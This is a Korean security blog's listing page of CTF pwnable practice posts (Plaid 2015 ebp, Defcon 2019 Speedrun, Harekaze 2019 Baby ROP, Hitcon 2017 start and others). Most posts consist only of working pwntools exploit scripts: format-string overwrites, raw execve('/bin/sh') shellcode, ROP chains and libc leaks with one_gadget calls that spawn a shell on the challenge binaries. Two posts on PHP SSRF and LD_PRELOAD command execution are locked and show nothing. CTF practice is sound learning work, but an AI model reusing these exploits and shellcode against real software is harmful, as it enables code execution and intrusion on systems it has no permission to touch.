'분류 전체보기'에 해당되는 글 1000건

2019.08.06 Plaid CTF 2015 ebp
2019.08.06 PHP SoapClient SSRF
2019.08.05 Layer7 CTF 2018 Life Game
2019.08.04 Pico CTF 2018 echooo
2019.08.02 Layer7 CTF 2018 Talmoru_party!~
2019.08.02 PHP Execute System Command With LD_PRELOAD
2019.08.01 Defcon CTF 2019 Speedrun 1,2
2019.08.01 Harekaze CTF 2019 Baby ROP 1,2
2019.07.31 wargame.kr lazy judge 1
2019.07.30 Hitcon CTF 2017 start

Plaid CTF 2015 ebp

System/Pwnable Practice 2019. 8. 6. 21:39

exploit.py

from pwn import *

p = process("./ebp")
e = ELF('./ebp')

payload = "%{0}p%4$n".format(e.got['fgets'])

p.sendline(payload)
p.recv(2048)

bufAddr = 0x0804A080
payload2 = "%{0}p%12$n".format(bufAddr+30)
payload2 += "\x90"*100
payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

p.sendline(payload2)
p.recv(2048)

p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

picoCTF 2018 authenticate (0)	2019.08.10
TUCTF CTF 2018 Ehh (0)	2019.08.09
Layer7 CTF 2018 Life Game (0)	2019.08.05
Pico CTF 2018 echooo (0)	2019.08.04
Layer7 CTF 2018 Talmoru_party!~ (0)	2019.08.02

JeonYoungSin

메모 기록용 공간

PHP SoapClient SSRF

2019. 8. 6. 20:20

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Layer7 CTF 2018 Life Game

System/Pwnable Practice 2019. 8. 5. 02:27

exploit.py

from pwn import *
  
for i in range(0,100):
	try:
		p = process("./life_game")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","-10000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","4")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","1000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","31337")
		p.sendlineafter("The last one\n","%"+str(i)+"$s")
		print p.recv()
		p.close()
	except:
		"fail"
		p.close()

'System > Pwnable Practice' 카테고리의 다른 글

TUCTF CTF 2018 Ehh (0)	2019.08.09
Plaid CTF 2015 ebp (0)	2019.08.06
Pico CTF 2018 echooo (0)	2019.08.04
Layer7 CTF 2018 Talmoru_party!~ (0)	2019.08.02
Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01

JeonYoungSin

메모 기록용 공간

Pico CTF 2018 echooo

System/Pwnable Practice 2019. 8. 4. 23:34

exploit.py

from pwn import *
  
p = process("./echo")

for i in range(1,100):
    try:
        p = process("./echo")
        payload ="%"+str(i)+"$s"
        p.sendlineafter("> ",payload)
        result = p.recv(2048)
        if "picoCTF" in result:
            print result
            break
        p.close()
    except:
        print "fail"
        p.close()

'System > Pwnable Practice' 카테고리의 다른 글

Plaid CTF 2015 ebp (0)	2019.08.06
Layer7 CTF 2018 Life Game (0)	2019.08.05
Layer7 CTF 2018 Talmoru_party!~ (0)	2019.08.02
Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01

JeonYoungSin

메모 기록용 공간

Layer7 CTF 2018 Talmoru_party!~

System/Pwnable Practice 2019. 8. 2. 23:46

exploit.py

from pwn import *

p = process("./vuln")
         
e = ELF("./vuln")
l = e.libc
        
p.sendlineafter(">>","3")
             
pr = 0x0804884b
restart = 0x80486E0

payload = "A"*(0x40+4)
payload += p32(e.plt['puts'])  
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)
    
p.sendlineafter("plz!\n",payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Life Game (0)	2019.08.05
Pico CTF 2018 echooo (0)	2019.08.04
Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30

JeonYoungSin

메모 기록용 공간

PHP Execute System Command With LD_PRELOAD

2019. 8. 2. 02:11

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Defcon CTF 2019 Speedrun 1,2

System/Pwnable Practice 2019. 8. 1. 21:45

speedrun1_exploit.py

from pwn import *

p = process("./vuln")
e = ELF('./vuln')

syscall = 0x474e65
pop_eax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
binsh = "/bin/sh\x00"
         
payload = "A"*0x400 
payload += "B"*8
payload += p64(pop_eax) 
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(e.bss())
payload += p64(pop_rdx)
payload += p64(len(binsh))
payload += p64(syscall)



payload += p64(pop_eax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(e.bss())
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)

p.sendlineafter("words?\n",payload)
sleep(0.1)
p.send(binsh)
p.interactive()

speedrun2_exploit.py

from pwn import *

p = process("./vuln")

e = ELF('./vuln')
l = e.libc

p.sendlineafter("now?\n","Everything intelligent is so boring.")

pr = 0x4008a3
         
payload = "A"*(0x400+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(0x40074C)
      
p.sendlineafter("more.\n",payload)
print p.recvuntil("Fascinating.\n")
puts_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + 0x10a38c

p.sendlineafter("now?\n","Everything intelligent is so boring.")

payload2 = "A"*(0x400+8)
payload2 += p64(one_addr)

print p.sendlineafter("more.\n",payload2)
sleep(0.1)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Pico CTF 2018 echooo (0)	2019.08.04
Layer7 CTF 2018 Talmoru_party!~ (0)	2019.08.02
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30
Codegate 2019 CTF aeiou (0)	2019.07.30

JeonYoungSin

메모 기록용 공간

Harekaze CTF 2019 Baby ROP 1,2

System/Pwnable Practice 2019. 8. 1. 20:04

bayrop1_exploit.py

from pwn import *
  
p = process("./babyrop1")

system = 0x400490
binsh = 0x601048
pr = 0x400683
ret = 0x400479

payload = "A"*(0x10+8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendlineafter("? ",payload)
p.interactive()

babyrop2_exploit.py

from pwn import *

p = process("./babyrop2")

e = ELF("./babyrop2")
l = e.libc

pr = 0x400733
ret = 0x4004d1
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

payload = "A"*(0x20+8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)

p.sendlineafter("? ",payload)
p.recvuntil("!\n")
read_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]

payload2 = "A"*(0x20+8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)
p.recvuntil("? ")
p.sendline(payload2)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Talmoru_party!~ (0)	2019.08.02
Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Hitcon CTF 2017 start (0)	2019.07.30
Codegate 2019 CTF aeiou (0)	2019.07.30
Codegate 2016 CTF Watermelon (0)	2019.07.29

JeonYoungSin

메모 기록용 공간

wargame.kr lazy judge

Wargame/wargame.kr 2019. 7. 31. 19:34

일 년인가 만에 wargame.kr에 들어가 보니 새로운 문제가 7개 정도 추가돼있었다.

추가된 문제 중에 웹이 딱 하나 있길래 구경해봤는데 엄청 재밌게 풀다가 출근해야 되는데 거의 밤을 새버렸다.

원래 롸업 올리려고 했는데 추가된 문제라 그런가 공개된 롸업도 하나도 없고 솔버도 적은 것 같아서 나중에 롸업들 좀 풀리면 정리해둔거 올려야겠다.

'Wargame > wargame.kr' 카테고리의 다른 글

wargame.kr pw crack (0)	2018.05.10
wargame.kr counting query (0)	2018.05.10
wargame.kr login with crypto! but.. (0)	2018.05.10
wargame.kr CustomOS (0)	2018.05.10
wargame.kr DLL with notepad (0)	2018.05.09

JeonYoungSin

메모 기록용 공간

Hitcon CTF 2017 start

System/Pwnable Practice 2019. 7. 30. 20:31

exploit.py

from pwn import *

p = process("./start")

e = ELF("./start")

payload = "A"*(0x20-12)
payload += "B"*4

p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"

read = 0x440300

payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8

payload2 += p64(pop_rdi)
payload2 += p64(0) 
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59) 
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)


p.sendline(payload2)

print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Defcon CTF 2019 Speedrun 1,2 (0)	2019.08.01
Harekaze CTF 2019 Baby ROP 1,2 (0)	2019.08.01
Codegate 2019 CTF aeiou (0)	2019.07.30
Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29

JeonYoungSin

메모 기록용 공간

'분류 전체보기'에 해당되는 글 1000건

Plaid CTF 2015 ebp

'System > Pwnable Practice' 카테고리의 다른 글

PHP SoapClient SSRF

Layer7 CTF 2018 Life Game

'System > Pwnable Practice' 카테고리의 다른 글

Pico CTF 2018 echooo

'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Talmoru_party!~

'System > Pwnable Practice' 카테고리의 다른 글

PHP Execute System Command With LD_PRELOAD

Defcon CTF 2019 Speedrun 1,2

'System > Pwnable Practice' 카테고리의 다른 글

Harekaze CTF 2019 Baby ROP 1,2

'System > Pwnable Practice' 카테고리의 다른 글

wargame.kr lazy judge

'Wargame > wargame.kr' 카테고리의 다른 글

Hitcon CTF 2017 start

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31